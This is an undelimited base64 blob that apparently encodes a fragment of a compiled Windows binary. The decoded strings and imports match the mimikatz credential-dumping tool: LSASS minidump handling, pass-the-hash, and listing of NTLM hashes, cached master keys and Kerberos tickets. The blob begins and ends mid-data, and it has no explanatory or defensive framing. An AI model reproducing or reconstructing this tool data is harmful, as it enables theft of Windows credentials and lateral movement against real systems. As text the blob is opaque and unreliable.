HIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAPwAgACgAdAB5AHAAZQAgAD4AIABDAFIARQBEAF8AVABZAFAARQBfAE0AQQBYAEkATQBVAE0AKQAAAAAAPABOAFUATABMAD4AAAAAAAAAAABUAGEAcgBnAGUAdABOAGEAbQBlACAAOgAgACUAcwAgAC8AIAAlAHMACgBVAHMAZQByAE4AYQBtAGUAIAAgACAAOgAgACUAcwAKAEMAbwBtAG0AZQBuAHQAIAAgACAAIAA6ACAAJQBzAAoAVAB5AHAAZQAgACAAIAAgACAAIAAgADoAIAAlAHUAIAAtACAAJQBzAAoAQwByAGUAZABlAG4AdABpAGEAbAAgADoAIAAAAAoACgAAAAAAaQBuAGYAbwBzAAAATQBpAG4AZQBTAHcAZQBlAHAAZQByACAAbQBvAGQAdQBsAGUAAAAAAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgAAAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgAuAGUAeABlAAAAAAAAAEYAaQBlAGwAZAAgADoAIAAlAHUAIAByACAAeAAgACUAdQAgAGMACgBNAGkAbgBlAHMAIAA6ACAAJQB1AAoACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AZQBtAG8AcgB5ACAAQwAgACgAUgAgAD0AIAAlAHUAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBlAG0AbwByAHkAIABSAAoAAAAAAAkAAAAlAEMAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABCAG8AYQByAGQAIABjAG8AcAB5AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABHAGEAbQBlACAAYwBvAHAAeQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwAgAGMAbwBwAHkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAbABvAGIAYQBsACAAYwBvAHAAeQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAFMAZQBhAHIAYwBoACAAaQBzACAASwBPAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AaQBuAGUAcwB3AGUAZQBwAGUAcgAgAE4AVAAgAEgAZQBhAGQAZQByAHMACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AaQBuAGUAcwB3AGUAZQBwAGUAcgAgAFAARQBCAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE4AbwAgAE0AaQBuAGUAUwB3AGUAZQBwAGUAcgAgAGkAbgAgAG0AZQBtAG8AcgB5ACEACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIABlAGwAZQBtAGUAbgB0AHMAIABmAHIAbwBtACAAYwBvAGwAdQBtAG4AOgAgACUAdQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAHIAZQBmAGUAcgBlAG4AYwBlAHMAIABmAHIAbwBtACAAYwBvAGwAdQBtAG4AOgAgACUAdQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAcgBlAGYAZQByAGUAbgBjAGUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAZgBpAHIAcwB0ACAAZQBsAGUAbQBlAG4AdAAKAAAAbABzAGEAcwByAHYAAAAAAExzYUlDYW5jZWxOb3RpZmljYXRpb24AAExzYUlSZWdpc3Rlck5vdGlmaWNhdGlvbgAAAABiAGMAcgB5AHAAdAAAAAAAQkNyeXB0T3BlbkFsZ29yaXRobVByb3ZpZGVyAEJDcnlwdFNldFByb3BlcnR5AAAAQkNyeXB0R2V0UHJvcGVydHkAAABCQ3J5cHRHZW5lcmF0ZVN5bW1ldHJpY0tleQAAQkNyeXB0RW5jcnlwdAAAAEJDcnlwdERlY3J5cHQAAABCQ3J5cHREZXN0cm95S2V5AAAAAEJDcnlwdENsb3NlQWxnb3JpdGhtUHJvdmlkZXIAAAAAMwBEAEUAUwAAAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBCAEMAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQAAAAAATwBiAGoAZQBjAHQATABlAG4AZwB0AGgAAAAAAEEARQBTAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBGAEIAAABDAGEAYwBoAGUAZABVAG4AbABvAGMAawAAAAAAQwBhAGMAaABlAGQAUgBlAG0AbwB0AGUASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAQwBhAGMAaABlAGQASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAUgBlAG0AbwB0AGUASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAATgBlAHcAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAABOAGUAdAB3AG8AcgBrAEMAbABlAGEAcgB0AGUAeAB0AAAAAABVAG4AbABvAGMAawAAAAAAUAByAG8AeAB5AAAAUwBlAHIAdgBpAGMAZQAAAEIAYQB0AGMAaAAAAE4AZQB0AHcAbwByAGsAAABJAG4AdABlAHIAYQBjAHQAaQB2AGUAAABVAG4AawBuAG8AdwBuACAAIQAAAFUAbgBkAGUAZgBpAG4AZQBkAEwAbwBnAG8AbgBUAHkAcABlAAAAAABMAGkAcwB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAATQBhAG4AYQBnAGUAcgAAAAAAYwByAGUAZABtAGEAbgAAAEwAaQBzAHQAIABDAGEAYwBoAGUAZAAgAE0AYQBzAHQAZQByAEsAZQB5AHMAAAAAAGQAcABhAHAAaQAAAEwAaQBzAHQAIABLAGUAcgBiAGUAcgBvAHMAIABFAG4AYwByAHkAcAB0AGkAbwBuACAASwBlAHkAcwAAAGUAawBlAHkAcwAAAEwAaQBzAHQAIABLAGUAcgBiAGUAcgBvAHMAIAB0AGkAYwBrAGUAdABzAAAAdABpAGMAawBlAHQAcwAAAFAAYQBzAHMALQB0AGgAZQAtAGgAYQBzAGgAAABwAHQAaAAAAAAAAABTAHcAaQB0AGMAaAAgACgAbwByACAAcgBlAGkAbgBpAHQAKQAgAHQAbwAgAEwAUwBBAFMAUwAgAG0AaQBuAGkAZAB1AG0AcAAgAGMAbwBuAHQAZQB4AHQAAAAAAG0AaQBuAGkAZAB1AG0AcAAAAAAAUwB3AGkAdABjAGgAIAAoAG8AcgAgAHIAZQBpAG4AaQB0ACkAIAB0AG8AIABMAFMAQQBTAFMAIABwAHIAbwBjAGUAcwBzACAAIABjAG8AbgB0AGUAeAB0AAAAAAAAAAAATABpAHMAdABzACAAYQBsAGwAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHAAcgBvAHYAaQBkAGUAcgBzACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzAAAAAABMAGkAcwB0AHMAIABTAFMAUAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAHMAcwBwAAAATABpAHMAdABzACAATABpAHYAZQBTAFMAUAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAGwAaQB2AGUAcwBzAHAAAABMAGkAcwB0AHMAIABUAHMAUABrAGcAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAB0AHMAcABrAGcAAABMAGkAcwB0AHMAIABLAGUAcgBiAGUAcgBvAHMAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAEwAaQBzAHQAcwAgAFcARABpAGcAZQBzAHQAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAB3AGQAaQBnAGUAcwB0AAAATABpAHMAdABzACAATABNACAAJgAgAE4AVABMAE0AIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABtAHMAdgAAAAAAAABTAG8AbQBlACAAYwBvAG0AbQBhAG4AZABzACAAdABvACAAZQBuAHUAbQBlAHIAYQB0AGUAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMALgAuAC4AAABTAGUAawB1AHIATABTAEEAIABtAG8AZAB1AGwAZQAAAHMAZQBrAHUAcgBsAHMAYQAAAAAAUwB3AGkAdABjAGgAIAB0AG8AIABQAFIATwBDAEUAUwBTAAoAAAAAAFMAdwBpAHQAYwBoACAAdABvACAATQBJAE4ASQBEAFUATQBQACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbQBpAG4AaQBkAHUAbQBwACAAOwAgADwAbQBpAG4AaQBkAHUAbQBwAGYAaQBsAGUALgBkAG0AcAA+ACAAYQByAGcAdQBtAGUAbgB0ACAAaQBzACAAbQBpAHMAcwBpAG4AZwAKAAAAAAAAAAAATwBwAGUAbgBpAG4AZwAgADoAIAAnACUAcwAnACAAZgBpAGwAZQAgAGYAbwByACAAbQBpAG4AaQBkAHUAbQBwAC4ALgAuAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATABTAEEAUwBTACAAcAByAG8AYwBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkACAAKAA/ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIABwAEkAbgBmAG8AcwAtAD4ATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAoACUAdQApACAAIQA9ACAATQBJAE0ASQBLAEEAVABaAF8ATgBUAF8ATQBBAEoATwBSAF8AVgBFAFIAUwBJAE8ATgAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIABwAEkAbgBmAG8AcwAtAD4AUAByAG8AYwBlAHMAcwBvAHIAQQByAGMAaABpAHQAZQBjAHQAdQByAGUAIAAoACUAdQApACAAIQA9ACAAUABSAE8AQwBFAFMAUwBPAFIAXwBBAFIAQwBIAEkAVABFAEMAVABVAFIARQBfAEkATgBUAEUATAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIAB3AGkAdABoAG8AdQB0ACAAUwB5AHMAdABlAG0ASQBuAGYAbwBTAHQAcgBlAGEAbQAgACgAPwApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEsAZQB5ACAAaQBtAHAAbwByAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEwAbwBnAG8AbgAgAGwAaQBzAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AbwBkAHUAbABlAHMAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AZQBtAG8AcgB5ACAAbwBwAGUAbgBpAG4AZwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAASABhAG4AZABsAGUAIABvAG4AIABtAGUAbQBvAHIAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAG8AYwBhAGwAIABMAFMAQQAgAGwAaQBiAHIAYQByAHkAIABmAGEAaQBsAGUAZAAKAAAAAAAJACUAcwAgADoACQAAAAAAAAAAAAoAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACAASQBkACAAOgAgACUAdQAgADsAIAAlAHUAIAAoACUAMAA4AHgAOgAlADAAOAB4ACkACgBTAGUAcwBzAGkAbwBuACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAAZgByAG8AbQAgACUAdQAKAFUAcwBlAHIAIABOAGEAbQBlACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAEQAbwBtAGEAaQBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAFMASQBEACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAcgB1AG4AAAAAAAAAdQBzAGUAcgAJADoAIAAlAHMACgBkAG8AbQBhAGkAbgAJADoAIAAlAHMACgBwAHIAbwBnAHIAYQBtAAkAOgAgACUAcwAKAAAAQQBFAFMAMQAyADgACQA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAxADIAOAAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAxADIAOAAgAGsAZQB5ACAAbwBuAGwAeQAgAHMAdQBwAHAAbwByAHQAZQBkACAAZgByAG8AbQAgAFcAaQBuAGQAbwB3AHMAIAA4AC4AMQAgACgAbwByACAANwAvADgAIAB3AGkAdABoACAAawBiADIAOAA3ADEAOQA5ADcAKQAKAAAAQQBFAFMAMgA1ADYACQA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAANgA0ACAAKAAzADIAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbwBuAGwAeQAgAHMAdQBwAHAAbwByAHQAZQBkACAAZgByAG8AbQAgAFcAaQBuAGQAbwB3AHMAIAA4AC4AMQAgACgAbwByACAANwAvADgAIAB3AGkAdABoACAAawBiADIAOAA3ADEAOQA5ADcAKQAKAAAAbgB0AGwAbQAAAAAATgBUAEwATQAJADoAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAG4AdABsAG0AIABoAGEAcwBoACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAIAAgAHwAIAAgAFAASQBEACAAIAAlAHUACgAgACAAfAAgACAAVABJAEQAIAAgACUAdQAKAAAAAAAgACAAfAAgACAATABVAEkARAAgACUAdQAgADsAIAAlAHUAIAAoACUAMAA4AHgAOgAlADAAOAB4ACkACgAAAAAAIAAgAFwAXwAgAG0AcwB2ADEAXwAwACAAIAAgAC0AIAAAAAAAIAAgAFwAXwAgAGsAZQByAGIAZQByAG8AcwAgAC0AIAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwBXAGkAdABoAEwAbwBnAG8AbgBXACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABNAGkAcwBzAGkAbgBnACAAYQB0ACAAbABlAGEAcwB0ACAAbwBuAGUAIABhAHIAZwB1AG0AZQBuAHQAIAA6ACAAbgB0AGwAbQAgAE8AUgAgAGEAZQBzADEAMgA4ACAATwBSACAAYQBlAHMAMgA1ADYACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAE0AaQBzAHMAaQBuAGcAIABhAHIAZwB1AG0AZQBuAHQAIAA6ACAAZABvAG0AYQBpAG4ACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABNAGkAcwBzAGkAbgBnACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAHUAcwBlAHIACgAAAAAAAAAAAAoACQAgACoAIABVAHMAZQByAG4AYQBtAGUAIAA6ACAAJQB3AFoACgAJACAAKgAgAEQAbwBtAGEAaQBuACAAIAAgADoAIAAlAHcAWgAAAAAACgAJACAAKgAgAEwATQAgACAAIAAgACAAIAAgADoAIAAAAAAACgAJACAAKgAgAE4AVABMAE0AIAAgACAAIAAgADoAIAAAAAAACgAJACAAKgAgAFMASABBADEAIAAgACAAIAAgADoAIAAAAAAAAAAAAAoACQAgACoAIABGAGwAYQBnAHMAIAAgACAAIAA6ACAAJQAwADIAeAAvAE4AJQAwADIAeAAvAEwAJQAwADIAeAAvAFMAJQAwADIAeAAvACUAMAAyAHgALwAlADAAMgB4AC8AJQAwADIAeAAvACUAMAAyAHgAAAAAAAoACQAgACoAIAB1AG4AawBuAG8AdwAgACAAIAA6ACAAAAAAAFsAMAAuAC4AMABdAAAAAAAKAAkAIAAqACAAUgBhAHcAIABkAGEAdABhACAAOgAgAAAAAAAKAAkAIAAqACAAUABJAE4AIABjAG8AZABlACAAOgAgACUAdwBaAAAACQAgACAAIAAlAHMAIAAAADwAbgBvACAAcwBpAHoAZQAsACAAYgB1AGYAZgBlAHIAIABpAHMAIABpAG4AYwBvAHIAcgBlAGMAdAA+AAAAAAAlAHcAWgAJACUAdwBaAAkAAAAAAAAAAAAKAAkAIAAqACAAVQBzAGUAcgBuAGEAbQBlACAAOgAgACUAdwBaAAoACQAgACoAIABEAG8AbQBhAGkAbgAgACAAIAA6ACAAJQB3AFoACgAJACAAKgAgAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAAAAAATABVAEkARAAgAEsATwAKAAAAAAAKAAkAIAAqACAAUgBvAG8AdABLAGUAeQAgACAAOgAgAAAAAAAKAAkAIAAqACAARABQAEEAUABJACAAIAAgACAAOgAgAAAAAAAKAAkAIAAqACAAJQAwADgAeAAgADoAIAAAAAAACgAJACAAWwAlADAAOAB4AF0AAABkAHAAYQBwAGkAcwByAHYALgBkAGwAbAAAAAAACQAgAFsAJQAwADgAeABdAAoACQAgACoAIABHAFUASQBEACAAIAAgACAAIAAgADoACQAAAAoACQAgACoAIABUAGkAbQBlACAAIAAgACAAIAAgADoACQAAAAoACQAgACoAIABNAGEAcwB0AGUAcgBLAGUAeQAgADoACQAAAAoACQBLAE8AAAAAAFQAaQBjAGsAZQB0ACAARwByAGEAbgB0AGkAbgBnACAAVABpAGMAawBlAHQAAAAAAEMAbABpAGUAbgB0ACAAVABpAGMAawBlAHQAIAA/AAAAVABpAGMAawBlAHQAIABHAHIAYQBuAHQAaQBuAGcAIABTAGUAcgB2AGkAYwBlAAAAawBlAHIAYgBlAHIAbwBzAC4AZABsAGwAAAAAAAoACQBHAHIAbwB1AHAAIAAlAHUAIAAtACAAJQBzAAAACgAJACAAKgAgAEsAZQB5ACAATABpAHMAdAAgADoACgAAAAAAZABhAHQAYQAgAGMAbwBwAHkAIABAACAAJQBwAAAAAAAKACAAIAAgAFwAXwAgACUAcwAgAAAAAAAtAD4AIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AZQBuAHUAbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYQBsAGwAYgBhAGMAawBfAHAAdABoACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAKACAAIAAgAFwAXwAgACoAUABhAHMAcwB3AG8AcgBkACAAcgBlAHAAbABhAGMAZQAgAC0APgAgAAAAAABuAHUAbABsAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGsAZQByAGIAZQByAG8AcwBfAGUAbgB1AG0AXwB0AGkAYwBrAGUAdABzACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAtACUAdwBaAEAAJQB3AFoALQAlAHcAWgAuACUAcwAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAuACUAcwAAAAAAbABpAHYAZQBzAHMAcAAuAGQAbABsAAAAQ3JlZGVudGlhbEtleXMAAFByaW1hcnkACgAJACAAWwAlADAAOAB4AF0AIAAlAFoAAAAAAGQAYQB0AGEAIABjAG8AcAB5ACAAQAAgACUAcAAgADoAIAAAAE8ASwAgACEAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAG0AcwB2AF8AZQBuAHUAbQBfAGMAcgBlAGQAXwBjAGEAbABsAGIAYQBjAGsAXwBwAHQAaAAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AYwBvAHAAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAALgAAAAAAAABuAC4AZQAuACAAKABLAEkAVwBJAF8ATQBTAFYAMQBfADAAXwBQAFIASQBNAEEAUgBZAF8AQwBSAEUARABFAE4AVABJAEEATABTACAASwBPACkAAAAAAAAAbgAuAGUALgAgACgASwBJAFcASQBfAE0AUwBWADEAXwAwAF8AQwBSAEUARABFAE4AVABJAEEATABTACAASwBPACkAAAB0AHMAcABrAGcALgBkAGwAbAAAAHcAZABpAGcAZQBzAHQALgBkAGwAbAAAAP7///8AAAAAtP///wAAAAD+////AAAAAIAzARAAAAAAkDEBEKQxARAAAAAA0jEBEOYxARAAAAAAFTIBECkyARAAAAAAWjIBEG4yARAAAAAAiTIBEJ0yARAAAAAAvjIBENIyARAAAAAAAzMBEBczARAAAAAASjMBEF4zARAAAAAA/v///wAAAADY////AAAAAP7////aZAEQ7mQBEBicAgAAAAAAAAAAAIikAgAAkAEACJ0CAAAAAAAAAAAAvKUCAPCQAQDEngIAAAAAAAAAAAAopgIArJIBAISeAgAAAAAAAAAAAGymAgBskgEAQJ4CAAAAAAAAAAAAqqcCACiSAQCUngIAAAAAAAAAAABAqAIAfJIBAHyeAgAAAAAAAAAAAGKoAgBkkgEArJ4CAAAAAAAAAAAAhKgCAJSSAQC0ngIAAAAAAAAAAACyqAIAnJIBAHSfAgAAAAAAAAAAAJyqAgBckwEAOJ0CAAAAAAAAAAAAnK4CACCRAQDgngIAAAAAAAAAAABmrwIAyJIBAAAAAAAAAAAAAAAAAAAAAAAAAAAA9J8CABCgAgAgoAIALKACAEKgAgBcoAIAdKACAIigAgCcoAIArKACALygAgDMoAIA2qACAPCgAgAAoQIAEqECACKhAgAyoQIASqECAFyhAgBsoQIAhqECAJqhAgCwoQIAxKECAN6hAgDwoQIACKICAByiAgAyogIASKICAFyiAgBuogIAgKICAJCiAgCuogIAwKICANKiAgDuogIACqMCACijAgBEowIATqMCAGKjAgB2owIAiqMCAJ6jAgCwowIAxKMCANajAgDmowIA+qMCAAqkAgAapAIALKQCAD6kAgBSpAIAaqQCAHakAgAAAAAAlqQCAK6kAgDSpAIA6KQCAPikAgAWpQIAOqUCAEylAgBwpQIAjqUCAKSlAgAAAAAAcrECAGKxAgBIsQIAKrECAA6xAgD6sAIA3LACAMawAgC6sAIApLACAIauAgByrgIAWq4CAEiuAgAqrgIADK4CAPytAgDgrQIA2K0CAMStAgCyrQIAoq0CAJStAgCErQIAeK0CAGKtAgBIrQIANq0CABytAgAKrQIA+KwCAOKsAgDMrAIAvKwCAKqsAgCarAIAhKwCAHKsAgBirAIATKwCADqsAgAorAIAFKwCAASsAgDwqwIA4KsCAM6rAgDAqwIAsKsCAJ6rAgCMqwIAeqsCAGqrAgBcqwIASKsCADqrAgAiqwIAEqsCAKaqAgC+qgIAzKoCANiqAgDkqgIA8KoCAP6qAgAAAAAALqcCAGanAgB0pwIAkqcCAFCnAgAgpwIAEKcCAPimAgDepgIA0KYCAHimAgCSpgIApKYCALSmAgAAAAAATKgCAAAAAABIpgIANqYCAFymAgAAAAAA2KcCAAqoAgAgqAIAtqcCAO6nAgAAAAAAbqgCAAAAAACcqAIAqKgCAJCoAgAAAAAA2qUCAB6mAgASpgIABqYCAPKlAgDIpQIAAAAAAHyvAgCQsAIAhrACAHqwAgBysAIAZrACAFiwAgBOsAIAQrACADawAgAssAIAIrACABqwAgAOsAIAALACAPSvAgDmrwIA1q8CAMyvAgAOrwIAGK8CACSvAgAurwIAOK8CAEKvAgBKrwIAVK8CAFyvAgByrwIAwq8CAIavAgCUrwIAnq8CAKqvAgC4rwIAmrACAAAAAAAErwIAqqkCAPCuAgDkrgIA2K4CAMyuAgDCrgIAuK4CAKquAgCWqQIAgKkCAGSpAgBQqQIANKkCACSpAgAMqQIA9KgCAOCoAgDAqAIAwqkCANypAgD2qQIAGKoCADiqAgBKqgIAYKoCAHSqAgCKqgIA+q4CAIixAgCSsQIAAAAAAH0BTHNhUXVlcnlJbmZvcm1hdGlvblBvbGljeQB1AUxzYU9wZW5Qb2xpY3kAVgFMc2FDbG9zZQAAZwBDcmVhdGVXZWxsS25vd25TaWQAAGEAQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcAYABDcmVhdGVQcm9jZXNzQXNVc2VyVwAA+AFSZWdRdWVyeVZhbHVlRXhXAADyAVJlZ1F1ZXJ5SW5mb0tleVcAAOIBUmVnRW51bVZhbHVlVwDtAVJlZ09wZW5LZXlFeFcA3wFSZWdFbnVtS2V5RXhXAMsBUmVnQ2xvc2VLZXkAPgBDbG9zZVNl